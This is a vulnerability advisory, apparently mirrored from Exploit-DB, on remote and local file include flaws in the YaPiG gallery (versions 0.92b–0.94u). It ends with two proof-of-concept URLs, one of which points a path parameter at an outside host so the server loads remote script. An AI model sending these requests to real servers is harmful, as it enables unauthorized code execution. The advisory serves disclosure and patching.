YaPiG Remote and Local File Include Vulnerabilities

vendor:

YaPiG

by:

SecurityFocus

7.5

CVSS

HIGH

Remote and Local File Include Vulnerabilities

CWE

Product Name: YaPiG

Affected Version From: 0.92b

Affected Version To: 0.94u

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2005

YaPiG Remote and Local File Include Vulnerabilities

YaPiG is affected by remote and local file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/13874/info

YaPiG is affected by remote and local file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.

This issue is reported to affect YaPiG versions 0.92b, 0.93u and 0.94u; earlier versions may also be affected. 

Version 0.92b: http://www.example.com/global.php?BASE_DIR=/local/path/to/global-gen.php
Version 0.93u/ 0.94u: http://www.example.com/last_gallery.php?YAPIG_PATH=http://www.example.com/